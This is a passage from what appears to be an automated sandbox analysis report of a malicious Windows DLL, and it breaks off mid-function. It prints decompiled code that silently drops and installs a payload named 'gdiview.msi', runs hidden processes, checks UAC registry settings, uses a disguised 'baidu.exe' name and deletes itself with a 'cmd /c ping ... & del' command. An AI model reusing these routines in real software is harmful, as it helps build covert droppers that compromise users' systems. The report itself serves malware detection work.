				E1000CD96( &_v1292,  &_v1292, 0x104, "gdiview.msi");
				E1000CC93(_t29,  &_v1028, "msiexec.exe /i \"%s\"",  &_v1292);
				E1001FC10( &_v1292, 0x100268a0, 0x39e00); // executed
				_t21 = PathFileExistsA( &_v1292); // executed
				_t38 = _t21;
				if(_t21 != 0) {
					_t22 = E1001A1D0(_t38,  &_v1028); // executed
					return _t22;
				}
				return _t21;
			}









                                                                                                                                                    0x1001fc70
                                                                                                                                                    0x1001fc79
                                                                                                                                                    0x1001fc8e
                                                                                                                                                    0x1001fc96
                                                                                                                                                    0x1001fcab
                                                                                                                                                    0x1001fcbf
                                                                                                                                                    0x1001fcd6
                                                                                                                                                    0x1001fcf1
                                                                                                                                                    0x1001fd0a
                                                                                                                                                    0x1001fd19
                                                                                                                                                    0x1001fd1f
                                                                                                                                                    0x1001fd21
                                                                                                                                                    0x1001fd2a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x1001fd2f
                                                                                                                                                    0x1001fd35

                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 1001FC8E
                                                                                                                                                    • _memset.LIBCMT ref: 1001FCAB
                                                                                                                                                    • GetTempPathA.KERNEL32(00000104,00000000), ref: 1001FCBF
                                                                                                                                                    • _strcat_s.LIBCMT ref: 1001FCD6
                                                                                                                                                    • _sprintf.LIBCMT ref: 1001FCF1
                                                                                                                                                      • Part of subcall function 1001FC10: CreateFileA.KERNELBASE(100268A0,40000000,00000000,00000000,00000002,00000080,00000000), ref: 1001FC33
                                                                                                                                                      • Part of subcall function 1001FC10: WriteFile.KERNELBASE(00039E00,00000000,00000000,100268A0,00000000), ref: 1001FC4E
                                                                                                                                                      • Part of subcall function 1001FC10: CloseHandle.KERNEL32(00039E00), ref: 1001FC63
                                                                                                                                                    • PathFileExistsA.KERNELBASE(00000000), ref: 1001FD19
                                                                                                                                                      • Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A1E5
                                                                                                                                                      • Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A209
                                                                                                                                                      • Part of subcall function 1001A1D0: CreateProcessA.KERNELBASE ref: 1001A22B
                                                                                                                                                      • Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A239
                                                                                                                                                      • Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A243
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000004.00000002.645019852.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                    • Associated: 00000004.00000002.645009330.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.645045809.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646312035.0000000010333000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646339843.0000000010338000.00000002.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646354560.0000000010339000.00000004.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memset$CloseFileHandle$CreatePath$ExistsProcessTempWrite_sprintf_strcat_s
                                                                                                                                                    • String ID: gdiview.msi$msiexec.exe /i "%s"
                                                                                                                                                    • API String ID: 1459467440-729886463
                                                                                                                                                    • Opcode ID: 9f37fd40726948a7e4bee4ce477389de5d9f041251b30934006de2a32398770c
                                                                                                                                                    • Instruction ID: 589b2706552b06c3ad0f95c51878850621e455b0e0cdf181a877dc72ff73cea3
                                                                                                                                                    • Opcode Fuzzy Hash: 9f37fd40726948a7e4bee4ce477389de5d9f041251b30934006de2a32398770c
                                                                                                                                                    • Instruction Fuzzy Hash: 011170FAD4021866E710D7A0EC46FEE732CDB14701F4444A4FB48A5085EBB1A7988FA2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1001DC00, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 119COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E1001DC00(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				struct _OSVERSIONINFOW _v284;
				char _v547;
				char _v548;
				char _v819;
				char _v820;
				char _v824;
				void* _t31;
				void* _t38;
				void* _t41;
				void* _t49;
				void* _t50;
				void* _t51;
				void* _t53;
				void* _t57;
				void* _t69;
				void* _t70;
				void* _t71;
				void* _t74;
				void* _t75;
				void* _t77;

				_t69 = __esi;
				_t68 = __edi;
				_t57 = __ebx;
				if(_a4 == 0) {
					return _t31;
				}
				_v820 = 0;
				E1000CF20(__edi,  &_v819, 0, 0x103);
				_v548 = 0;
				_t58 =  &_v547;
				E1000CF20(_t68,  &_v547, 0, 0x103);
				_t65 =  &(_v284.dwMajorVersion);
				E1000CF20(_t68,  &(_v284.dwMajorVersion), 0, 0x110);
				_t74 = _t71 + 0x24;
				_v284.dwOSVersionInfoSize = 0x114;
				GetVersionExW( &_v284);
				if(_v284.dwMajorVersion != 6 || _v284.dwMinorVersion != 2 || E1001D240() == 0) {
					_t38 = E1001D7E0(_t68,  &_v548); // executed
					_t75 = _t74 + 4;
					__eflags = _t38;
					if(_t38 != 0) {
						L11:
						E1001D2D0(_t58,  &_v548);
						_t65 =  &_v820;
						_t41 = E1001CCF0( &_v820, 0x104,  &_v824);
						_t77 = _t75 + 0x10;
						__eflags = _t41;
						if(_t41 >= 0) {
							_t65 = 0x104 - _v824;
							__eflags = 0x104;
							E1001CC50( &_v548, 0x104 - _v824, _t70 + _v824 - 0x330);
							_t77 = _t77 + 0xc;
						}
						goto L13;
					}
					_t49 = E1001D560(_t68,  &_v548); // executed
					_t75 = _t75 + 4;
					__eflags = _t49;
					if(_t49 != 0) {
						goto L11;
					}
					_t58 =  &_v548;
					_t50 = E1001DA70(_t68,  &_v548); // executed
					_t75 = _t75 + 4;
					__eflags = _t50;
					if(_t50 != 0) {
						goto L11;
					}
					_t65 =  &_v548;
					_t51 = E1001D370(_t57, _t68, _t69,  &_v548);
					_t77 = _t75 + 4;
					__eflags = _t51;
					if(_t51 == 0) {
						goto L13;
					}
					goto L11;
				} else {
					_t53 = E1001DA70(_t68,  &_v548);
					_t77 = _t74 + 4;
					_t84 = _t53;
					if(_t53 != 0) {
						_t65 =  &_v548;
						E1001D2D0( &_v548,  &_v548);
						E1001D320(_t84,  &_v820,  &_v548);
						_t77 = _t77 + 0xc;
					}
					L13:
					if(_v820 == 0) {
						_t65 =  &_v820;
						E1001CFA0("Mid2Failed", 0x104,  &_v820);
						_t77 = _t77 + 0xc;
					}
					return E1000D8A3(_t65, _a4, 0x104,  &_v820);
				}
			}























                                                                                                                                                    0x1001dc00
                                                                                                                                                    0x1001dc00
                                                                                                                                                    0x1001dc00
                                                                                                                                                    0x1001dc0d
                                                                                                                                                    0x1001ddb4
                                                                                                                                                    0x1001ddb4
                                                                                                                                                    0x1001dc13
                                                                                                                                                    0x1001dc28
                                                                                                                                                    0x1001dc30
                                                                                                                                                    0x1001dc3e
                                                                                                                                                    0x1001dc45
                                                                                                                                                    0x1001dc54
                                                                                                                                                    0x1001dc5b
                                                                                                                                                    0x1001dc60
                                                                                                                                                    0x1001dc63
                                                                                                                                                    0x1001dc74
                                                                                                                                                    0x1001dc81
                                                                                                                                                    0x1001dcd9
                                                                                                                                                    0x1001dcde
                                                                                                                                                    0x1001dce1
                                                                                                                                                    0x1001dce3
                                                                                                                                                    0x1001dd1e
                                                                                                                                                    0x1001dd25
                                                                                                                                                    0x1001dd39
                                                                                                                                                    0x1001dd40
                                                                                                                                                    0x1001dd45
                                                                                                                                                    0x1001dd48
                                                                                                                                                    0x1001dd4a
                                                                                                                                                    0x1001dd5f
                                                                                                                                                    0x1001dd5f
                                                                                                                                                    0x1001dd6d
                                                                                                                                                    0x1001dd72
                                                                                                                                                    0x1001dd72
                                                                                                                                                    0x00000000
                                                                                                                                                    0x1001dd4a
                                                                                                                                                    0x1001dcec
                                                                                                                                                    0x1001dcf1
                                                                                                                                                    0x1001dcf4
                                                                                                                                                    0x1001dcf6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x1001dcf8
                                                                                                                                                    0x1001dcff
                                                                                                                                                    0x1001dd04
                                                                                                                                                    0x1001dd07
                                                                                                                                                    0x1001dd09
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x1001dd0b
                                                                                                                                                    0x1001dd12
                                                                                                                                                    0x1001dd17
                                                                                                                                                    0x1001dd1a
                                                                                                                                                    0x1001dd1c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x1001dc95
                                                                                                                                                    0x1001dc9c
                                                                                                                                                    0x1001dca1
                                                                                                                                                    0x1001dca4
                                                                                                                                                    0x1001dca6
                                                                                                                                                    0x1001dca8
                                                                                                                                                    0x1001dcaf
                                                                                                                                                    0x1001dcc5
                                                                                                                                                    0x1001dcca
                                                                                                                                                    0x1001dcca
                                                                                                                                                    0x1001dd75
                                                                                                                                                    0x1001dd7e
                                                                                                                                                    0x1001dd80
                                                                                                                                                    0x1001dd91
                                                                                                                                                    0x1001dd96
                                                                                                                                                    0x1001dd96
                                                                                                                                                    0x00000000
                                                                                                                                                    0x1001ddae

                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 1001DC28
                                                                                                                                                    • _memset.LIBCMT ref: 1001DC45
                                                                                                                                                    • _memset.LIBCMT ref: 1001DC5B
                                                                                                                                                    • GetVersionExW.KERNEL32(00000114), ref: 1001DC74
                                                                                                                                                    • _strcpy_s.LIBCMT ref: 1001DDA9
                                                                                                                                                      • Part of subcall function 1001D240: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\,00000000,00020019,00000000), ref: 1001D27E
                                                                                                                                                      • Part of subcall function 1001D240: RegQueryValueExW.ADVAPI32(00000000,EnableLUA,00000000,00000004,00000000,00000004), ref: 1001D29F
                                                                                                                                                      • Part of subcall function 1001D240: RegCloseKey.ADVAPI32(00000000), ref: 1001D2B9
                                                                                                                                                      • Part of subcall function 1001DA70: wsprintfW.USER32 ref: 1001DABC
                                                                                                                                                      • Part of subcall function 1001DA70: CreateFileW.KERNELBASE(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 1001DAD8
                                                                                                                                                      • Part of subcall function 1001DA70: _memset.LIBCMT ref: 1001DB21
                                                                                                                                                      • Part of subcall function 1001DA70: DeviceIoControl.KERNELBASE(000000FF,002D1400,?,0000000C,?,00002710,?,00000000), ref: 1001DB50
                                                                                                                                                      • Part of subcall function 1001DA70: _memset.LIBCMT ref: 1001DB68
                                                                                                                                                      • Part of subcall function 1001DA70: FindCloseChangeNotification.KERNELBASE(000000FF), ref: 1001DBB4
                                                                                                                                                      • Part of subcall function 1001D2D0: _strlen.LIBCMT ref: 1001D2DE
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000004.00000002.645019852.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                    • Associated: 00000004.00000002.645009330.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.645045809.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646312035.0000000010333000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646339843.0000000010338000.00000002.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646354560.0000000010339000.00000004.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memset$Close$ChangeControlCreateDeviceFileFindNotificationOpenQueryValueVersion_strcpy_s_strlenwsprintf
                                                                                                                                                    • String ID: Mid2Failed
                                                                                                                                                    • API String ID: 3782552391-1001836097
                                                                                                                                                    • Opcode ID: d6779b6fc69960ca1185ec9ad32e9fe93277f40ee64ea61d2690e460a00d514a
                                                                                                                                                    • Instruction ID: 0380dca2423836e3a58abbfcea20b0743b1f23a39fde08b5816f1d15e7fb933b
                                                                                                                                                    • Opcode Fuzzy Hash: d6779b6fc69960ca1185ec9ad32e9fe93277f40ee64ea61d2690e460a00d514a
                                                                                                                                                    • Instruction Fuzzy Hash: F54176B5D0021967E714F7A0AD86FE9737DEB14744F4404A9EA0899142F771FBC8CB92
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1001FEA0, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 59COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 67%
                                                                                                                                                    			E1001FEA0(void* __ebx, void* __edi, void* __esi, void* __eflags, char _a4) {
				char _v8;
				intOrPtr _v16;
				char _v44;
				char _v311;
				char _v312;
				char _v575;
				char _v576;
				void* _t30;
				intOrPtr _t43;
				void* _t50;

				_t50 = __eflags;
				_t41 = __edi;
				_push(0xffffffff);
				_push(E10022991);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t43;
				_v8 = 0;
				_v576 = 0;
				E1000CF20(__edi,  &_v575, 0, 0x103);
				_v312 = 0;
				E1000CF20(_t41,  &_v311, 0, 0x103);
				E1001A600(__ebx, _t41, __esi, _t50,  &_v44); // executed
				GetTempPathA(0x104,  &_v576);
				_push(E100011E0( &_a4));
				_push("0011");
				_push(E100011E0( &_v44));
				E1000CC93(_t41,  &_v312, "%s%s %s %s",  &_v576);
				E1001A1D0(_t50,  &_v312); // executed
				E100011A0( &_v44);
				_v8 = 0xffffffff;
				_t30 = E100011A0( &_a4);
				 *[fs:0x0] = _v16;
				return _t30;
			}













                                                                                                                                                    0x1001fea0
                                                                                                                                                    0x1001fea0
                                                                                                                                                    0x1001fea3
                                                                                                                                                    0x1001fea5
                                                                                                                                                    0x1001feb0
                                                                                                                                                    0x1001feb1
                                                                                                                                                    0x1001febe
                                                                                                                                                    0x1001fec5
                                                                                                                                                    0x1001feda
                                                                                                                                                    0x1001fee2
                                                                                                                                                    0x1001fef7
                                                                                                                                                    0x1001ff03
                                                                                                                                                    0x1001ff17
                                                                                                                                                    0x1001ff25
                                                                                                                                                    0x1001ff26
                                                                                                                                                    0x1001ff33
                                                                                                                                                    0x1001ff47
                                                                                                                                                    0x1001ff56
                                                                                                                                                    0x1001ff61
                                                                                                                                                    0x1001ff66
                                                                                                                                                    0x1001ff70
                                                                                                                                                    0x1001ff78
                                                                                                                                                    0x1001ff82

                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 1001FEDA
                                                                                                                                                    • _memset.LIBCMT ref: 1001FEF7
                                                                                                                                                      • Part of subcall function 1001A600: _memset.LIBCMT ref: 1001A651
                                                                                                                                                      • Part of subcall function 1001A600: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A667
                                                                                                                                                      • Part of subcall function 1001A600: _sprintf.LIBCMT ref: 1001A6A5
                                                                                                                                                    • GetTempPathA.KERNEL32(00000104,00000000), ref: 1001FF17
                                                                                                                                                    • _sprintf.LIBCMT ref: 1001FF47
                                                                                                                                                      • Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A1E5
                                                                                                                                                      • Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A209
                                                                                                                                                      • Part of subcall function 1001A1D0: CreateProcessA.KERNELBASE ref: 1001A22B
                                                                                                                                                      • Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A239
                                                                                                                                                      • Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A243
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000004.00000002.645019852.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                    • Associated: 00000004.00000002.645009330.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.645045809.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646312035.0000000010333000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646339843.0000000010338000.00000002.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646354560.0000000010339000.00000004.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memset$CloseHandle_sprintf$CreateFileModuleNamePathProcessTemp
                                                                                                                                                    • String ID: %s%s %s %s$0011
                                                                                                                                                    • API String ID: 3552933064-2132516514
                                                                                                                                                    • Opcode ID: 8c795c8e977f3a4369ad49c2275de349265d23a2f8b40290b590e07dd810c88d
                                                                                                                                                    • Instruction ID: 340cbf6f15e955c302097f1968a88b67a0c80ae1c193be8bba9c5dfb65cc733a
                                                                                                                                                    • Opcode Fuzzy Hash: 8c795c8e977f3a4369ad49c2275de349265d23a2f8b40290b590e07dd810c88d
                                                                                                                                                    • Instruction Fuzzy Hash: F511B6B6C00208ABE714EB90DC46FDD7778EB04750F4445A4FA15661C1EB747788CFA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1001A1D0, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46processCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E1001A1D0(void* __eflags, CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				CHAR* _v24;
				struct _STARTUPINFOA _v100;
				int _t18;
				void* _t27;

				_v24 = 0;
				E1000CF20(_t27,  &_v100, 0, 0x44);
				_v100.cb = 0x44;
				_v100.dwFlags = 1;
				_v100.wShowWindow = 0;
				E1000CF20(_t27,  &_v20, 0, 0x10);
				_t18 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0,  &_v100,  &_v20); // executed
				if(_t18 != 0) {
					CloseHandle(_v20.hThread);
					CloseHandle(_v20);
					_v24 = 1;
				}
				return _v24;
			}








                                                                                                                                                    0x1001a1d6
                                                                                                                                                    0x1001a1e5
                                                                                                                                                    0x1001a1ed
                                                                                                                                                    0x1001a1f4
                                                                                                                                                    0x1001a1fb
                                                                                                                                                    0x1001a209
                                                                                                                                                    0x1001a22b
                                                                                                                                                    0x1001a233
                                                                                                                                                    0x1001a239
                                                                                                                                                    0x1001a243
                                                                                                                                                    0x1001a249
                                                                                                                                                    0x1001a249
                                                                                                                                                    0x1001a256

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000004.00000002.645019852.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                    • Associated: 00000004.00000002.645009330.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.645045809.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646312035.0000000010333000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646339843.0000000010338000.00000002.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646354560.0000000010339000.00000004.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseHandle_memset$CreateProcess
                                                                                                                                                    • String ID: D
                                                                                                                                                    • API String ID: 1151464618-2746444292
                                                                                                                                                    • Opcode ID: 557970b9edb45a931c14d8d0c11eae38125c3284053bbb1ae6d97d12128e6d7c
                                                                                                                                                    • Instruction ID: ef4eb28381490467371c772dbf4cc47cae63647d7d2172f01b5caa4c4fe940a9
                                                                                                                                                    • Opcode Fuzzy Hash: 557970b9edb45a931c14d8d0c11eae38125c3284053bbb1ae6d97d12128e6d7c
                                                                                                                                                    • Instruction Fuzzy Hash: 8601E1B590031DABEB00DBD0DC8AFEE77B9FB44704F144518FA04AB285D7B5A904CBA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1001A260, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36processCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E1001A260() {
				char _v267;
				char _v268;
				char _v531;
				char _v532;
				int _t15;
				void* _t20;

				_v532 = 0;
				E1000CF20(_t20,  &_v531, 0, 0x103);
				_v268 = 0;
				E1000CF20(_t20,  &_v267, 0, 0x103);
				GetModuleFileNameA(0,  &_v532, 0x104);
				E1000CC93(_t20,  &_v268, "cmd /c ping 127.0.0.1 -n 3 & del \"%s\"",  &_v532);
				_t15 = WinExec( &_v268, 0); // executed
				return _t15;
			}









                                                                                                                                                    0x1001a269
                                                                                                                                                    0x1001a27e
                                                                                                                                                    0x1001a286
                                                                                                                                                    0x1001a29b
                                                                                                                                                    0x1001a2b1
                                                                                                                                                    0x1001a2ca
                                                                                                                                                    0x1001a2db
                                                                                                                                                    0x1001a2e4

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    • cmd /c ping 127.0.0.1 -n 3 & del "%s", xrefs: 1001A2BE
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000004.00000002.645019852.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                    • Associated: 00000004.00000002.645009330.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.645045809.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646312035.0000000010333000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646339843.0000000010338000.00000002.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646354560.0000000010339000.00000004.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memset$ExecFileModuleName_sprintf
                                                                                                                                                    • String ID: cmd /c ping 127.0.0.1 -n 3 & del "%s"
                                                                                                                                                    • API String ID: 2874319085-10483710
                                                                                                                                                    • Opcode ID: 948203268a293c978ab836c2cb42371c1eb1cd051dbbe68a1683a2ab6a760ac6
                                                                                                                                                    • Instruction ID: 1002a94702f99074cc5a7191c0e86848812ee27a6531f1c6c96f6cd2bf050705
                                                                                                                                                    • Opcode Fuzzy Hash: 948203268a293c978ab836c2cb42371c1eb1cd051dbbe68a1683a2ab6a760ac6
                                                                                                                                                    • Instruction Fuzzy Hash: 6EF0AF7988431C6AE720D760DC8AFE9772CAB20700F0005D4F6986A0C1EAF067C88BA2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1001A600, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                    			E1001A600(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				struct HINSTANCE__* _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v52;
				char _v53;
				short _v55;
				char _v59;
				char _v63;
				char _v67;
				char _v71;
				char _v72;
				char _v335;
				char _v336;
				signed int _v340;
				void* __ebp;
				intOrPtr _t40;
				void* _t45;
				intOrPtr _t73;

				_t80 = __eflags;
				_t72 = __esi;
				_t71 = __edi;
				_t54 = __ebx;
				_push(0xffffffff);
				_push(E1002293E);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t73;
				_v340 = 0;
				E10001160( &_v52, __eflags, 0x10024ca1);
				_v8 = 0;
				_v336 = 0;
				E1000CF20(__edi,  &_v335, 0, 0x103);
				GetModuleFileNameA(0,  &_v336, 0x104);
				_t40 = E1001A170( &_v336); // executed
				_v24 = _t40;
				_v72 = 0;
				_v71 = 0;
				_v67 = 0;
				_v63 = 0;
				_v59 = 0;
				_v55 = 0;
				_v53 = 0;
				E1000CC93(_t71,  &_v72, "%d", _v24);
				_v20 = E1001A480(__ebx,  &_v72, _t71, __esi, _t80,  &_v72);
				_t81 = _v20;
				if(_v20 != 0) {
					E10001EB0(__ebx,  &_v52, _t71, __esi, _t81, _v20);
					E10001EB0(__ebx,  &_v52, _t71, __esi, _t81, ".exe");
					_push(_v20);
					E1000CA30(_t54, _t71, _t72, _t81);
				}
				_t45 = E10001200( &_v52);
				_t82 = _t45;
				if(_t45 == 0) {
					E10001EB0(_t54,  &_v52, _t71, _t72, _t82, "baidu.exe");
				}
				E10001110(_a4, _t82,  &_v52);
				_v340 = _v340 | 0x00000001;
				_v8 = 0xffffffff;
				E100011A0( &_v52);
				 *[fs:0x0] = _v16;
				return _a4;
			}






















                                                                                                                                                    0x1001a600
                                                                                                                                                    0x1001a600
                                                                                                                                                    0x1001a600
                                                                                                                                                    0x1001a600
                                                                                                                                                    0x1001a603
                                                                                                                                                    0x1001a605
                                                                                                                                                    0x1001a610
                                                                                                                                                    0x1001a611
                                                                                                                                                    0x1001a61e
                                                                                                                                                    0x1001a630
                                                                                                                                                    0x1001a635
                                                                                                                                                    0x1001a63c
                                                                                                                                                    0x1001a651
                                                                                                                                                    0x1001a667
                                                                                                                                                    0x1001a674
                                                                                                                                                    0x1001a67c
                                                                                                                                                    0x1001a67f
                                                                                                                                                    0x1001a685
                                                                                                                                                    0x1001a688
                                                                                                                                                    0x1001a68b
                                                                                                                                                    0x1001a68e
                                                                                                                                                    0x1001a691
                                                                                                                                                    0x1001a695
                                                                                                                                                    0x1001a6a5
                                                                                                                                                    0x1001a6b9
                                                                                                                                                    0x1001a6bc
                                                                                                                                                    0x1001a6c0
                                                                                                                                                    0x1001a6c9
                                                                                                                                                    0x1001a6d6
                                                                                                                                                    0x1001a6de
                                                                                                                                                    0x1001a6df
                                                                                                                                                    0x1001a6e4
                                                                                                                                                    0x1001a6ea
                                                                                                                                                    0x1001a6ef
                                                                                                                                                    0x1001a6f1
                                                                                                                                                    0x1001a6fb
                                                                                                                                                    0x1001a6fb
                                                                                                                                                    0x1001a707
                                                                                                                                                    0x1001a715
                                                                                                                                                    0x1001a71b
                                                                                                                                                    0x1001a725
                                                                                                                                                    0x1001a730
                                                                                                                                                    0x1001a73a

                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 1001A651
                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A667
                                                                                                                                                      • Part of subcall function 1001A170: FindFirstFileA.KERNELBASE(1001A679,?), ref: 1001A18E
                                                                                                                                                      • Part of subcall function 1001A170: FindClose.KERNELBASE(000000FF), ref: 1001A1B6
                                                                                                                                                    • _sprintf.LIBCMT ref: 1001A6A5
                                                                                                                                                      • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A4BB
                                                                                                                                                      • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A4CE
                                                                                                                                                      • Part of subcall function 1001A480: _strlen.LIBCMT ref: 1001A4DA
                                                                                                                                                      • Part of subcall function 1001A480: _strlen.LIBCMT ref: 1001A4FD
                                                                                                                                                      • Part of subcall function 1001A480: _sprintf.LIBCMT ref: 1001A56C
                                                                                                                                                      • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A5B6
                                                                                                                                                      • Part of subcall function 1000CA30: ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                      • Part of subcall function 1000CA30: ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                      • Part of subcall function 1000CA30: HeapFree.KERNEL32(00000000,?,10330FC8,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                      • Part of subcall function 1000CA30: GetLastError.KERNEL32(?,?,?,?,?,?,?,10330FC8), ref: 1000CAA9
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000004.00000002.645019852.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                    • Associated: 00000004.00000002.645009330.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.645045809.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646312035.0000000010333000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646339843.0000000010338000.00000002.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646354560.0000000010339000.00000004.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memset$FileFind_sprintf_strlen$CloseErrorFirstFreeHeapLastModuleName___sbh_find_block___sbh_free_block
                                                                                                                                                    • String ID: .exe$baidu.exe
                                                                                                                                                    • API String ID: 3164538923-2273953317
                                                                                                                                                    • Opcode ID: 9de09fe9330ed60a657a313d2d9a6059508003b8440a63405d1a604815247515
                                                                                                                                                    • Instruction ID: b6fee11c051c4486a61eb580666bbed80fdb76d14c945059c36e32c3b8bf292f
                                                                                                                                                    • Opcode Fuzzy Hash: 9de09fe9330ed60a657a313d2d9a6059508003b8440a63405d1a604815247515
                                                                                                                                                    • Instruction Fuzzy Hash: CA3169B5C10258ABEB04DFA0EC82FEEB7B4FF08744F000169F509A7281EB746A44CB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1001FDC0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 71%
                                                                                                                                                    			E1001FDC0(void* __ebx, void* __edi, void* __esi, void* __eflags, char _a4) {
				char _v8;
				intOrPtr _v16;
				char _v44;
				char _v311;
